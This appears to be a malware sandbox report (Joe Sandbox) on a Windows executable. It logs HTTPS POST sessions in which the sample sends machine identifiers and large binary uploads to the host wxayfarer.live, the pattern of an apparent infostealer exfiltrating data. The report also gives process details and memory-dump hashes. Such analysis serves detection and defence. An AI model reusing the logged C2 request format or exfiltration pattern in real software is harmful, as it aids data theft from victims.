                                                            2025-03-25 07:16:41 UTC1369INData Raw: ee 91 9f bd 9e 59 80 48 d3 7f b0 e5 b0 12 1a 7a 2a 16 02 23 4d f3 23 18 4f 2e 04 2e 9a d0 7a cd 48 79 0a 4b 48 49 2c f9 19 0e 2f 0e 44 bc ce 33 ec 33 5b 3c 80 11 94 ce b2 fc 50 a8 bd 09 f8 39 dd e9 93 ea ed d6 54 33 49 55 f7 14 08 9d 80 3b 18 99 5c ef 1d ed 09 bd d7 12 5d 9f 58 1d c4 23 fa 2d ab 30 59 b1 0f 4d 99 15 a4 32 63 87 14 0c 90 32 cb ff c6 c2 72 7a d0 07 5d d2 a3 fd e0 67 ff 87 6e 30 3c a4 9c 8e 70 1b 50 02 d0 3a 13 5b 3a 33 04 3b 91 a2 6b ed cc 6e 40 4b ee f2 43 c9 30 5b 55 49 ec fc 69 19 77 65 1f d8 b7 61 6d 2f 06 30 44 1e a2 85 7a 82 7f b6 d1 17 dd 1b fe 7c f4 fb 56 35 35 ec 7e 03 c6 72 e4 2d f9 ba 6d ad 85 3b fd 20 d7 54 3e 33 46 71 c5 9f 22 9f 82 9e 0d 74 e5 7d 6e 60 40 87 dd 78 01 f9 b0 1a 7d 4c 82 4f 1a 1e 35 1c 5e 21 38 bb 5a 72 14 77 23
                                                            Data Ascii: YHz*#M#O..zHyKHI,/D33[<P9T3IU;\]X#-0YM2c2rz]gn0<pP:[:3;kn@KC0[UIiweam/0Dz|V55~r-m; T>3Fq"t}n`@x}LO5^!8Zrw#
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 6e 8e cc f4 50 25 03 1c e5 53 d2 a5 bc da c9 5e a3 9f 15 11 14 17 40 3d 38 54 1b 72 a0 7c 16 6d f2 14 af 27 10 de 82 a9 35 e8 14 a5 fb 27 39 74 a5 ec e0 24 53 d5 20 9d 14 dd 12 c2 32 7b 77 92 b6 71 41 86 7e cf 76 be bd b7 47 95 18 27 cf b8 5f 3a 26 9a 54 78 91 fb cb 18 3d 60 f4 8f ef 06 d5 ec 2e d3 6b 1e 19 24 a5 8f 60 c1 5b d3 de 71 31 e6 ca 97 65 e1 4c 61 8d 85 b3 4b c0 ce ae 9e aa 0e 57 a7 01 df 8f 2e cf df 7c 0e cf b7 cf 46 d9 e7 e2 db 8d c9 01 72 56 74 9a 7e 3e 92 e3 d3 11 96 1d 13 0d 9a 00 65 72 b7 ff 75 cf 08 d8 76 bf fe a7 2c 8d 6b 45 f6 d7 00 07 bf ec 5f 8b 3e 3d 8d 51 1d 82 fa 97 84 6c 29 87 1a b7 42 7d ae 54 cc 1b f3 75 2b a5 dd c8 42 b1 9d 33 ef 18 81 fb 97 92 f4 56 a0 93 bc 93 bf a8 38 3f dd 5e 84 8d e1 dc 4b ad 7f 35 b6 99 c7 75 f4 35 1c 5d
                                                            Data Ascii: nP%S^@=8Tr|m'5'9t$S 2{wqA~vG'_:&Tx=`.k$`[q1eLaKW.|FrVt~>eruv,kE_>=Ql)B}Tu+B3V8?^K5u5]
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 50 8a 84 59 65 05 74 5d 22 0c ad 2e 8f d6 55 86 15 4b 88 f7 ba ef 9f 3b 9e b0 f7 42 cd 10 eb 8a be 14 e0 be db 24 a5 32 ae 83 a1 82 55 d8 43 c9 2a 80 83 a4 08 b0 21 fd b6 28 66 3a dd cd 66 33 9b 1e 69 9a e7 8d ba c7 09 c7 f6 64 88 47 fc 95 22 86 62 29 4c 92 a6 35 b9 e2 e6 11 08 68 f0 9e 51 e6 a9 f8 e2 68 f0 5e 8f 1e 10 36 49 96 5e 64 6d 7c be e5 3a 7e 56 51 aa 3e 06 74 6d f6 8a c3 00 bd 79 f8 79 36 a0 00 b1 40 06 c3 f7 d8 63 3e 4d cb 92 0a 1f 84 5d 4f 34 c5 ec bd c5 bc 2e 57 64 d9 6a cd 5e 01 04 4e c2 c7 a3 52 ac 60 5d a7 2d d6 81 3c b9 89 76 b4 82 ab 90 ee 85 40 6d 3f bc 1e be be 24 bf 0d 66 81 c5 0f 00 92 7a 2b f8 47 3c 9c be e9 f0 27 fd 89 92 b2 d0 05 8c e2 25 37 19 27 e1 5b ae d7 ba 74 04 d9 8d b4 7c 88 ed fb 78 16 28 58 53 c0 97 27 0b bf ee ac 32 b8
                                                            Data Ascii: PYet]".UK;B$2UC*!(f:f3idG"b)L5hQh^6I^dm|:~VQ>tmyy6@c>M]O4.Wdj^NR`]-<v@m?$fz+G<'%7'[t|x(XS'2
                                                            2025-03-25 07:16:41 UTC1369INData Raw: ce 8e 20 00 f5 29 f5 b4 58 20 40 e6 fc 1b 42 e0 ac 40 0c b0 18 b1 3f 9e ad f9 7f a3 ff 64 23 35 9b 9b d5 4a 76 19 d0 17 dd 64 92 6f 1a 1a 2e b4 68 29 05 2d 1d 72 ee 97 82 1e 7c 01 f8 3f 43 e4 89 86 6e e7 d8 36 8f 88 02 4d 3d e5 4a 17 46 bd 24 90 7a f3 32 2b f5 5b 9d 79 91 09 8d 74 b6 01 b3 3d ec b8 b6 a3 12 0f 8f 4e 9d 42 95 db 12 1c 7f c1 a3 86 02 73 35 7e e7 f8 a1 1d d7 78 d1 c1 41 5c bc 50 8c 8f b7 8e 3d 49 98 c0 e6 46 33 1a 44 c8 6c ed 8b 9b ea cf 30 42 04 33 ed de 07 19 0b fc f8 1b c5 95 60 8d 40 cf 83 f2 48 ee 60 24 3a 8e 70 ed 0a f2 02 7f c4 89 fd 13 3a 17 4b 57 1c 3b 7a a1 c6 fd fb 08 96 00 b2 cd 89 bc 6b 53 7a 4c 90 bc 2f 5c 57 84 40 fa b8 28 24 04 fa a2 5e 68 6b 96 a8 b9 1b ee 65 d9 9a 02 c4 8a 86 ff 9b b9 06 4a 78 55 78 92 78 cf e3 f6 ac a6 3c
                                                            Data Ascii: )X @B@?d#5Jvdo.h)-r|?Cn6M=JF$z2+[yt=NBs5~xA\P=IF3Dl0B3`@H`$:p:KW;zkSzL/\W@($^hkeJxUxx<
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 77 26 e3 86 d2 8b 4b 57 ed 3c 11 54 ec 6c 34 82 4a 8e ad 0d 82 32 d9 f5 db d0 27 d1 f4 2d f7 50 86 a8 6a 2b 39 af 81 b9 a5 86 96 db 82 5e d5 fa 14 cd 1a 30 bd eb 55 66 3b c4 dd ce 81 23 9d c0 79 4d 80 24 97 1f 39 18 99 4a 64 e9 51 20 0c d7 ae 50 8d db c2 aa aa 56 42 75 51 f5 48 a6 06 40 ce 3f e0 19 f5 61 8a 88 36 a1 68 c3 2e a6 73 a8 ed 61 54 26 af 06 32 c8 dc 6a 84 14 b4 08 fa ac 42 fb 01 62 07 e2 4c 6a ee dd 15 ea c9 88 e8 4d 6f 94 bf 0d d5 bc 5a 49 43 0f d4 70 7b dc b1 87 4a 91 0d de 89 ec a3 ec 4d a7 ba 23 d9 6b 0a 4a df 4f a4 bc 9d 1f e4 d0 e0 d4 36 79 a9 6f 1e e2 05 51 e1 ad ef 53 d3 8d a7 93 94 cc 65 d7 0c be ef d1 08 53 4d f8 f8 a0 f6 72 fe 84 77 b1 13 77 96 81 2b e1 60 63 7d 6a 40 8b 97 37 e2 a0 f8 b4 07 a4 28 26 f9 ed 00 d5 b4 9e 9c 0d 93 29 b1
                                                            Data Ascii: w&KW<Tl4J2'-Pj+9^0Uf;#yM$9JdQ PVBuQH@?a6h.saT&2jBbLjMoZICp{JM#kJO6yoQSeSMrww+`c}j@7(&)
                                                            2025-03-25 07:16:41 UTC1369INData Raw: cb ba 45 4d fe 80 22 28 7e 3d 00 9f 41 58 bb 8b d6 99 af d0 f2 1f 70 48 f8 9a eb 96 e9 01 9f f1 39 e2 1a 48 d7 9e 37 c7 2a b1 ce 87 b0 47 45 96 37 17 72 5e 03 ba a0 ae 02 fd 15 9d ac f7 e8 1a 48 c1 44 79 c9 22 fd 0c eb 7c ba 91 ad e0 49 9b 8b 9f 83 15 1d e5 a0 d9 bb 19 ed 2a 2b 41 92 e5 b0 e3 92 60 a9 1c c6 30 7f c9 0f 46 56 d9 9c a1 62 fc 23 46 63 7e d7 bf 68 d1 f7 6b 38 66 31 ca 12 88 a7 80 e0 2a a0 94 09 cd 93 49 f8 5d 93 6e 09 b8 46 c0 97 6e c9 a3 d3 17 7e f9 ed b8 e0 a3 1d 1d 47 f6 e3 43 e5 6d 70 7d 9d 16 cf b3 1b 1a e4 93 66 4d 6c c3 3f 45 c2 c3 a3 46 99 5f 08 b8 7c c5 28 9d b2 f8 70 8e 02 c7 a5 f5 e0 82 bc a2 a0 c3 1d 28 ed 6b 3d 14 3c 3a 80 2a 3c 92 78 aa 93 aa 77 ae b9 bf d1 e5 0e 67 0c 17 df d8 cc 59 5d 8a 97 ff 4b b8 dd 46 16 cf 4d 55 3b c4 51
                                                            Data Ascii: EM"(~=AXpH9H7*GE7r^HDy"|I*+A`0FVb#Fc~hk8f1*I]nFn~GCmp}fMl?EF_|(p(k=<:*<xwgY]KFMU;Q


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49682        104.21.112.1    443               6940  C:\Users\user\Desktop\Qyk8RJnGN7.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-25 07:16:42 UTC  281                OUT        POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WdE9K61h266dYShr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 14498
Host: wxayfarer.live
                                                            2025-03-25 07:16:42 UTC14498OUTData Raw: 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37
                                                            Data Ascii: --WdE9K61h266dYShrContent-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--WdE9K61h266dYShrContent-Disposition: form-data; name="pid"2--WdE9K61h266dYShrContent-Disposition: form-data; name="hwid"22720F477
2025-03-25 07:16:43 UTC  820                IN         HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 07:16:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8f3J91uAb5YaKFnBN7WXEJAOpohGI%2Bygwee0bxNspm%2B%2FDogfEX65IQJnilWDEfZX%2FraNThIoniyb1G58%2FVTAwmTZAijm1bMXX69SOLc%2BxmKA52%2B7U553qj856ApiY2%2FPfw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925c9fd7eb4042ce-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=96476&min_rtt=96376&rtt_var=20493&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15437&delivery_rate=38488&cwnd=245&unsent_bytes=0&cid=5a744fbfa97d2fb6&ts=563&x=0"
2025-03-25 07:16:43 UTC  73                 IN         Data Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
2025-03-25 07:16:43 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49683        104.21.112.1    443               6940  C:\Users\user\Desktop\Qyk8RJnGN7.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-25 07:16:43 UTC  276                OUT        POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7nIl8IbbSMd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 15035
Host: wxayfarer.live
                                                            2025-03-25 07:16:43 UTC15035OUTData Raw: 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37 33 44 44 32 46 38 44 33 38 30 31 35 45 33 30
                                                            Data Ascii: --7nIl8IbbSMdContent-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--7nIl8IbbSMdContent-Disposition: form-data; name="pid"2--7nIl8IbbSMdContent-Disposition: form-data; name="hwid"22720F4773DD2F8D38015E30
2025-03-25 07:16:44 UTC  810                IN         HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 07:16:44 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLaLtddRXep6Mf1dD05Gr0f9%2BKXVmYry9wW%2Fe1o9AfZsD4KCvrhGCMU8XX1vmndqRPQy1AbY40mObZgT3aTONfjXXeNxIk82LWT9q8tNgKaTOobBRakRFpn6ELh%2BfvUgcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925c9fdf1d4cde95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=96174&min_rtt=95550&rtt_var=20793&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15969&delivery_rate=38977&cwnd=247&unsent_bytes=0&cid=a2adc8116cb786b9&ts=502&x=0"
2025-03-25 07:16:44 UTC  73                 IN         Data Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
2025-03-25 07:16:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49684        104.21.112.1    443               6940  C:\Users\user\Desktop\Qyk8RJnGN7.exe

Timestamp                Bytes transferred  Direction  Data
2025-03-25 07:16:45 UTC  284                OUT        POST /ALosnz HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=jOQnh3r5bI1x49WdCM4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 20400
Host: wxayfarer.live
                                                            2025-03-25 07:16:45 UTC | 15331 | OUT | Data Ascii (CRLF line breaks restored from the raw bytes; the chunk is truncated in the report):
                                                            --jOQnh3r5bI1x49WdCM4
                                                            Content-Disposition: form-data; name="uid"

                                                            db98bb430160fb366da61dc7445589178b6c4ac86d
                                                            --jOQnh3r5bI1x49WdCM4
                                                            Content-Disposition: form-data; name="pid"

                                                            3
                                                            --jOQnh3r5bI1x49WdCM4
                                                            Content-Disposition: form-data; name="hwid"

                                                            2025-03-25 07:16:45 UTC | 5069 | OUT | [non-printable binary payload; hex dump omitted]
                                                            2025-03-25 07:16:45 UTC | 808 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:45 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jfbT%2BBiY%2BCA0LlbvjQym4avDnGlxJaplDq1N1tkEGibbw6RUCajIwsaXIcQ0ddxbESbq2uLJF9nipOXspM53kLRkqnfV0pUYwf5aQEvdwJklJs8Lj8bvhqp1MtcAO1Zg7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9fe5aeaf1b53-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96480&min_rtt=96402&rtt_var=20371&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21364&delivery_rate=38617&cwnd=246&unsent_bytes=0&cid=32105559971342a2&ts=574&x=0"
                                                            2025-03-25 07:16:45 UTC | 73 | IN | Data Ascii (chunked body; "43" is the chunk length in hex):
                                                            43
                                                            {"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:45 UTC | 5 | IN | Data Ascii (terminating zero-length chunk):
                                                            0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.7 | 49685 | 104.21.112.144 | 443 | 6940 | C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-25 07:16:47 UTC | 272 | OUT | POST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=C3zlAj9M
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 2509
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:47 UTC | 2509 | OUT | Data Ascii (CRLF line breaks restored from the raw bytes; the chunk is truncated in the report):
                                                            --C3zlAj9M
                                                            Content-Disposition: form-data; name="uid"

                                                            db98bb430160fb366da61dc7445589178b6c4ac86d
                                                            --C3zlAj9M
                                                            Content-Disposition: form-data; name="pid"

                                                            1
                                                            --C3zlAj9M
                                                            Content-Disposition: form-data; name="hwid"

                                                            22720F4773DD2F8D38015E30E5E45899
                                                            2025-03-25 07:16:47 UTC | 818 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:47 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RJWBKNxRMOS8h0X7vcZdnXFmP2ZAfYr%2Fnna%2BAj%2Bn8OybKXJ0Ev0zGKjjP1rAVJjvef%2BKaG27LhRYrcSy%2Bz8KxOHPwDDzKx4crllbHy52lVShhh%2FplAtH%2BcHkC2b9J3%2B0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9ff2ca04917b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=97713&min_rtt=96417&rtt_var=21684&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2833&recv_bytes=3417&delivery_rate=38628&cwnd=251&unsent_bytes=0&cid=ecced2235e38954f&ts=365&x=0"
                                                            2025-03-25 07:16:47 UTC | 73 | IN | Data Ascii (chunked body; "43" is the chunk length in hex):
                                                            43
                                                            {"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:47 UTC | 5 | IN | Data Ascii (terminating zero-length chunk):
                                                            0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.7 | 49686 | 104.21.112.144 | 443 | 6940 | C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-25 07:16:48 UTC | 276 | OUT | POST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=t2hEn3p4K2
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 552064
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:48 UTC | 15331 | OUT | Data Ascii (CRLF line breaks restored from the raw bytes; the chunk is truncated in the report):
                                                            --t2hEn3p4K2
                                                            Content-Disposition: form-data; name="uid"

                                                            db98bb430160fb366da61dc7445589178b6c4ac86d
                                                            --t2hEn3p4K2
                                                            Content-Disposition: form-data; name="pid"

                                                            1
                                                            --t2hEn3p4K2
                                                            Content-Disposition: form-data; name="hwid"

                                                            22720F4773DD2F8D38015E30E5E
                                                            2025-03-25 07:16:48 UTC | 15331 (nine further chunks of this size shown in the report) | OUT | [non-printable binary payload; hex dumps omitted]
                                                            2025-03-25 07:16:49 UTC | 816 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:49 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsxOQTT0tzT7pRuyf5115o2qi0rvquSGfWeSJSoft%2BJ9epBk9%2F0Igygyk3f3uQD3ZEAGSg%2FKplupJcCP4WMjfNMcXMPdw1T3QwIVOsGILnPyi0TYBr%2F14c4JNqBVuygdPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9ff939d39d36-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96935&min_rtt=96901&rtt_var=20498&sent=296&recv=454&lost=0&retrans=0&sent_bytes=2833&recv_bytes=554560&delivery_rate=38395&cwnd=251&unsent_bytes=0&cid=b6862b80287c7cee&ts=1304&x=0"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.7 | 49687 | 104.21.112.144 | 443 | 6940 | C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-25 07:16:49 UTC | 265 | OUT | POST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 89
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:49 UTC | 89 | OUT | Data Ascii:
                                                            uid=db98bb430160fb366da61dc7445589178b6c4ac86d&cid=&hwid=22720F4773DD2F8D38015E30E5E45899
                                                            2025-03-25 07:16:50 UTC | 780 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:50 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 104
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2CTxFgo4B0eQAdBaJL%2B5TSjV2ySGDw6N2tUjBbiU3PJacaE40LLTAFssg8Do1fi0oIGj4nNdggyKTq2VqM2hB6hCiKwAJqgsZSLWmSddx8Ab4wbPZv3fWQ0fJyNAt2ptA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925ca0039bf923ce-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96405&min_rtt=96276&rtt_var=20504&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=990&delivery_rate=38540&cwnd=251&unsent_bytes=0&cid=4a925a33f0acdf40&ts=552&x=0"
                                                            2025-03-25 07:16:50 UTC | 104 | IN | [non-printable binary response body (application/octet-stream); hex dump omitted]


                                                            Target ID: 0
                                                            Start time: 03:16:38
                                                            Start date: 25/03/2025
                                                            Path: C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: "C:\Users\user\Desktop\Qyk8RJnGN7.exe"
                                                            Imagebase: 0xc90000
                                                            File size: 2'930'176 bytes
                                                            MD5 hash: 880AF66F46621859F8330E966419E8CF
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: low
                                                            Has exited: true

                                                            Non-executed Functions

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.999657128.0000000001516000.00000004.00000020.00020000.00000000.sdmp, Offset: 01516000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_1516000_Qyk8RJnGN7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: '$Wind
                                                            • API String ID: 0-1062680885
                                                            • Opcode ID: 9ebf6f0c0a551cd1b440c4f63216fb442879d27352d4ddcd8fa7c88b5cbeec8b
                                                            • Instruction ID: f4453cf72ed668f71b8ff50400e907e4e8963552481702bd2d58449a02e7a21b
                                                            • Opcode Fuzzy Hash: 9ebf6f0c0a551cd1b440c4f63216fb442879d27352d4ddcd8fa7c88b5cbeec8b
                                                            • Instruction Fuzzy Hash: 88320F6144E7C25FE3138B748C696957FB1AF13228B1E46DBC4D08F4E7E29D894AC362
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.984015002.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_14a7000_Qyk8RJnGN7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcb358ed5c7070a5400725e4309323cdc77960945dfb58641ae921c6d71f22c5
                                                            • Instruction ID: c3020337311cb59ee07640ea8ebce41f5ce69b60cc67cae18488984bfab5586f
                                                            • Opcode Fuzzy Hash: dcb358ed5c7070a5400725e4309323cdc77960945dfb58641ae921c6d71f22c5
                                                            • Instruction Fuzzy Hash: DFB170310097D29FC7678F7884A56A37FF1EF07324B2909E9E0C18D463E26A1953CB62